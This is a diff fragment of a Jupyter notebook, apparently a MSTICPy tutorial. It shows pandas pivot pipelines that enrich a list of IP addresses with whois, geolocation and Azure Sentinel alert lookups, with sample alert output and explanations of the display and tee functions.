+    "   where the pivot function returned no result.\n",
+    "7. Is the same as 6 except is a data query to see if we have any alerts\n",
+    "   that contain these IP addresses. Remember, in the case of data queries\n",
+    "   we have to name the specific query parameter that we want the input to \n",
+    "   go to. In this case, each row value in the \"ip\" column from the previous\n",
+    "   stage will be sent to the query.\n",
+    "8. Finally we close the parentheses to form a valid Python expression.\n",
+    "   The whole expression returns a DataFrame so we can add further pandas\n",
+    "   operations here (like `.head(5)` shown here)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 43,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "ip_list = [\n",
+    "    \"192.168.40.32\",\n",
+    "    \"192.168.1.216\",\n",
+    "    \"192.168.153.17\",\n",
+    "    \"3.88.48.125\",\n",
+    "    \"10.200.104.20\",\n",
+    "    \"192.168.90.101\",\n",
+    "    \"192.168.150.50\",\n",
+    "    \"172.16.100.31\",\n",
+    "    \"192.168.30.189\",\n",
+    "    \"10.100.199.10\",\n",
+    "]\n",
+    "ips_df = pd.DataFrame(ip_list, columns=[\"IP\"])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 44,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>query</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type_x</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>...</th>\n",
+       "      <th>AlertType</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type_y</th>\n",
+       "      <th>SystemAlertId1</th>\n",
+       "      <th>ExtendedProperties1</th>\n",
+       "      <th>Entities1</th>\n",
+       "      <th>MatchingIps</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d_8a369bd2-97b6-4fe2-922a-cd170faf25bc</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-19 13:04:59+00:00</td>\n",
+       "      <td>2020-12-19 19:04:59+00:00</td>\n",
+       "      <td>2020-12-19 19:10:17+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>CommandAndControl</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>fdc54c12-efba-38b0-8379-f06d7fbfd34a</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>625ff9af-dddc-0cf8-9d4b-e79067fa2e71</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>c977f904-ab30-d57e-986f-9d6ebf72771b</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>9ee547e4-cba1-47d1-e1f9-87247b693a52</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:16+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>83a0e08a-1adb-ef75-1c56-f6c9ce25ca69</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 63 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            IP           ip  result    asn     asn_cidr asn_country_code  \\\n",
+       "0  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "1  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "2  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "3  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "4  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "\n",
+       "     asn_date asn_description asn_registry  \\\n",
+       "0  2017-12-20  AMAZON-AES, US         arin   \n",
+       "1  2017-12-20  AMAZON-AES, US         arin   \n",
+       "2  2017-12-20  AMAZON-AES, US         arin   \n",
+       "3  2017-12-20  AMAZON-AES, US         arin   \n",
+       "4  2017-12-20  AMAZON-AES, US         arin   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "1  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "2  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "3  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "4  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "\n",
+       "    nir        query   raw raw_referral referral CountryCode    CountryName  \\\n",
+       "0  None  3.88.48.125  None         None     None          US  United States   \n",
+       "1  None  3.88.48.125  None         None     None          US  United States   \n",
+       "2  None  3.88.48.125  None         None     None          US  United States   \n",
+       "3  None  3.88.48.125  None         None     None          US  United States   \n",
+       "4  None  3.88.48.125  None         None     None          US  United States   \n",
+       "\n",
+       "      State     City  Longitude  Latitude   Asn edges       Type_x  \\\n",
+       "0  Virginia  Ashburn   -77.4728   39.0481  None    {}  geolocation   \n",
+       "1  Virginia  Ashburn   -77.4728   39.0481  None    {}  geolocation   \n",
+       "2  Virginia  Ashburn   -77.4728   39.0481  None    {}  geolocation   \n",
+       "3  Virginia  Ashburn   -77.4728   39.0481  None    {}  geolocation   \n",
+       "4  Virginia  Ashburn   -77.4728   39.0481  None    {}  geolocation   \n",
+       "\n",
+       "  AdditionalData  ...  \\\n",
+       "0             {}  ...   \n",
+       "1             {}  ...   \n",
+       "2             {}  ...   \n",
+       "3             {}  ...   \n",
+       "4             {}  ...   \n",
+       "\n",
+       "                                                                   AlertType  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d_8a369bd2-97b6-4fe2-922a-cd170faf25bc   \n",
+       "1                                                         ThreatIntelligence   \n",
+       "2                                                         ThreatIntelligence   \n",
+       "3                                                         ThreatIntelligence   \n",
+       "4                                                         ThreatIntelligence   \n",
+       "\n",
+       "  ConfidenceLevel ConfidenceScore IsIncident              StartTimeUtc  \\\n",
+       "0                             NaN      False 2020-12-19 13:04:59+00:00   \n",
+       "1              83             NaN      False 2020-12-23 13:48:23+00:00   \n",
+       "2              83             NaN      False 2020-12-23 13:48:23+00:00   \n",
+       "3              83             NaN      False 2020-12-23 13:48:23+00:00   \n",
+       "4              83             NaN      False 2020-12-23 13:48:23+00:00   \n",
+       "\n",
+       "                 EndTimeUtc         ProcessingEndTime RemediationSteps  \\\n",
+       "0 2020-12-19 19:04:59+00:00 2020-12-19 19:10:17+00:00                    \n",
+       "1 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "2 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "3 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "4 2020-12-23 13:48:23+00:00 2020-12-23 14:08:16+00:00                    \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0         [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "\n",
+       "  SourceSystem               WorkspaceSubscriptionId WorkspaceResourceGroup  \\\n",
+       "0    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "1    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "2    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "3    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "4    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "\n",
+       "  ExtendedLinks     ProductName                     ProductComponentName  \\\n",
+       "0                Azure Sentinel                         Scheduled Alerts   \n",
+       "1                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "2                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "3                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "4                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "\n",
+       "   AlertLink Status CompromisedEntity            Tactics         Type_y  \\\n",
+       "0               New                    CommandAndControl  SecurityAlert   \n",
+       "1               New       3.88.48.125            Unknown  SecurityAlert   \n",
+       "2               New       3.88.48.125            Unknown  SecurityAlert   \n",
+       "3               New       3.88.48.125            Unknown  SecurityAlert   \n",
+       "4               New       3.88.48.125            Unknown  SecurityAlert   \n",
+       "\n",
+       "                         SystemAlertId1  \\\n",
+       "0  fdc54c12-efba-38b0-8379-f06d7fbfd34a   \n",
+       "1  625ff9af-dddc-0cf8-9d4b-e79067fa2e71   \n",
+       "2  c977f904-ab30-d57e-986f-9d6ebf72771b   \n",
+       "3  9ee547e4-cba1-47d1-e1f9-87247b693a52   \n",
+       "4  83a0e08a-1adb-ef75-1c56-f6c9ce25ca69   \n",
+       "\n",
+       "                                                                                   ExtendedProperties1  \\\n",
+       "0  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "\n",
+       "                                                                                             Entities1  \\\n",
+       "0         [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "\n",
+       "     MatchingIps  \n",
+       "0  [3.88.48.125]  \n",
+       "1  [3.88.48.125]  \n",
+       "2  [3.88.48.125]  \n",
+       "3  [3.88.48.125]  \n",
+       "4  [3.88.48.125]  \n",
+       "\n",
+       "[5 rows x 63 columns]"
+      ]
+     },
+     "execution_count": 44,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(10)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\", join=\"left\")\n",
+    ").head(5)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Other pipeline functions\n",
+    "\n",
+    "In addition to `run`, the `mp_pivot` accessor also \n",
+    "has the following functions:\n",
+    "- `display` - this simply displays the data at the point called in\n",
+    "  the pipeline. You can add an optional title, filtering and the number\n",
+    "  or rows to display\n",
+    "- `tee` - this forks a copy of the dataframe at the point it is\n",
+    "  called in the pipeline. It will assign the forked copy to the name\n",
+    "  given in the `var_name` parameter. If there is an existing variable of\n",
+    "  the same name it will not overwrite it unless you add the `clobber=True`\n",
+    "  parameter.\n",
+    "  \n",
+    "In both cases the pipelined data is passed through unchanged.\n",
+    "See [Pivot functions help](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html#mp-pivot-display)\n",
+    "for more details.\n",
+    "\n",
+    "Use of these is shown below"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "```\n",
+    "    ...\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"Geo Lookup\", cols=[\"IP\", \"City\"])  # << display an intermediate result\n",
+    "    .mp_pivot.tee(var_name=\"geoip_df\", clobber=True)  # << save a copy called 'geoip_df'\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\", join=\"left\")\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "In the next release we've also implemented:\n",
+    "- `tee_exec` - this executes a function on a forked copy of the DataFrame\n",
+    "  The function must be a pandas function or custom accessor. A\n",
+    "  good example of the use of this might be creating a plot or summary\n",
+    "  table to display partway through the pipeline."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
